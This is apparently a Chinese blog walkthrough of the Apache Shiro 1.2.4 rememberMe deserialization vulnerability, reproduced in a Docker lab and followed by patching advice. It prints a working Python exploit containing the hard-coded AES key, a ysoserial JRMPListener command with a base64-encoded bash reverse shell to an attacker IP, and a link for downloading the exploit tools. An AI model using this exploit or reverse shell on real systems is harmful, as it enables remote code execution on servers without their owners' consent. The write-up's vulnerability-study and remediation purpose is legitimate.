25. Apache Shiro Java反序列化漏洞

时间:2023-12-29 13:47:56

25. Apache Shiro Java反序列化漏洞

前言:

最近在审核漏洞的时候,发现尽管Apache shiro这个反序列化漏洞爆出来好久了,但是由于漏洞特征不明显,并且shiro这个组件之前很少听说,导致大厂很多服务还存在shiro反序列化的漏洞,这里对漏洞进行简单分析与复现。

一.漏洞前析

0x01 什么是Apache Shiro?

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。

0x02 漏洞的特征是什么?

shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段

就像这样:

25. Apache Shiro Java反序列化漏洞

0x03 漏洞影响

只要rememberMe的AES加密密钥泄露,Apache Shiro <= 1.2.4版本均存在威胁

二.漏洞简介

0x01 漏洞发生的原因

先看下shiro官网的漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550

25. Apache Shiro Java反序列化漏洞

大概意思是,shiro在登陆处提供了Remember Me这个功能,来记录用户登陆的凭证

25. Apache Shiro Java反序列化漏洞

然后shiro使用了CookieRememberMeManager类对用户的登陆凭证,也就是remember Me的内容进行一系列处理:

使用Java序列化 ---> 使用密钥进行AES加密 ---> Base64加密 ---> 得到加密后的remember Me内容

25. Apache Shiro Java反序列化漏洞

同时在识别用户身份的时候,需要对remember Me的字段进行解密,解密的顺序为:

remember Me加密内容 ---> Base64解密 ---> 使用密钥进行AES解密 --->Java反序列化

问题出在AES加密的密钥Key被硬编码在代码里,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的remember Me字段发送,Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。

通过源码,果然找到了被硬编码在代码里的Key值:

25. Apache Shiro Java反序列化漏洞

三.漏洞复现

0x01 环境搭建

这里使用docker进行环境搭建:https://github.com/Medicean/VulApps/tree/master/s/shiro/1

.拉取环境到本地
$ docker pull medicean/vulapps:s_shiro_1
.启动环境
$ docker run -d -p : medicean/vulapps:s_shiro_1

25. Apache Shiro Java反序列化漏洞

上图即为搭建成功

同时要编译生成ysoserial反序列化利用工具

ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests

即可生成ysoserial-0.0.6-SNAPSHOT-all.jar文件

25. Apache Shiro Java反序列化漏洞

0x02 poc利用过程

靶机ip:192.168.127.128

攻击机ip:192.168.127.129

大佬poc:shiro_poc.py:

#coding: utf-8

import os
import re
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES JAR_FILE = './ysoserial-0.0.6-SNAPSHOT-all.jar' def poc(url, rce_command):
if '://' not in url:
target = 'https://%s' % url if ':443' in url else 'http://%s' % url
else:
target = url
try:
payload = generator(rce_command, JAR_FILE) # 生成payload
r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=10) # 发送验证请求
print r.text
except Exception, e:
pass
return False def generator(command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'JRMPClient', command],
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext if __name__ == '__main__':
poc("http://192.168.127.128:8080","192.168.127.129:1096")

这里直接以getshell为例

首先制作反弹shell的命令,使用http://www.jackson-t.ca/runtime-exec-payloads.html进行编码

25. Apache Shiro Java反序列化漏洞

使用ysoserial中的JRMP监听模块,监听1096 端口

这里介绍一下上面poc里面的JRMPClient与下面使用监听命令的JRMPListenter

  • payloads/JRMPClient 是结合 exploit/JRMPListener 使用的
  • JRMPListener是ysoserial 工具里的其中一个利用模块,作用是通过反序列化,开启当前主机的一个 JRMP Server ,具体的利用过程是,将反序列化数据 发送到 Server 中,然后Server中进行反序列化操作,并开启指定端口,然后在通过JRMPClient去发送攻击 payload
  • payloads/JRMPClient 生存的 payload 是发送给目标机器的,exploit/JRMPListener 是在自己服务器上使用的
  • 超详细分析:https://xz.aliyun.com/t/2650

我这里在攻击机上执行监听命令:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar  ysoserial.exploit.JRMPListener 1096 CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNy4xMjkvODg4OCAwPiYx}|{base64,-d}|{bash,-i}

25. Apache Shiro Java反序列化漏洞

在要反弹到的机器上执行监听8888端口,静候shell

25. Apache Shiro Java反序列化漏洞

执行poc:

py -2 shiro_poc.py

可以看到JRMP模块已经成功收到连接请求,同时也执行了我们的payload,shell弹了回来

25. Apache Shiro Java反序列化漏洞

至此利用成功。

这里提供工具下载包括

  • poc文件
  • ysoserial-0.0.6-SNAPSHOT-all.jar文件
  • 密钥硬编码文件shiro-core-1.2.4.jar

链接:https://pan.baidu.com/s/175Zbe53ahIYese1rZCWFKg
提取码:66p1

四.修补建议

升级shiro到1.2.5及以上,如果shiro的rememberMe功能的AES密钥一旦泄露,就会导致反序列化漏洞。

跟了shiro 1.3.2的代码,看到官方的操作如下:

  • 删除代码里的默认密钥
  • 默认配置里注释了默认密钥
  • 如果不配置密钥,每次会重新随机一个密钥

可以看到并没有对反序列化做安全限制,只是在逻辑上对该漏洞进行了处理。
如果在配置里自己单独配置AES的密钥,并且密钥一旦泄露,那么漏洞依然存在。

参考链接:

https://www.cnblogs.com/paperpen/p/11312671.html

https://paper.seebug.org/shiro-rememberme-1-2-4/

https://mp.weixin.qq.com/s/KkWL9SftCZSdkglW39Qw0Q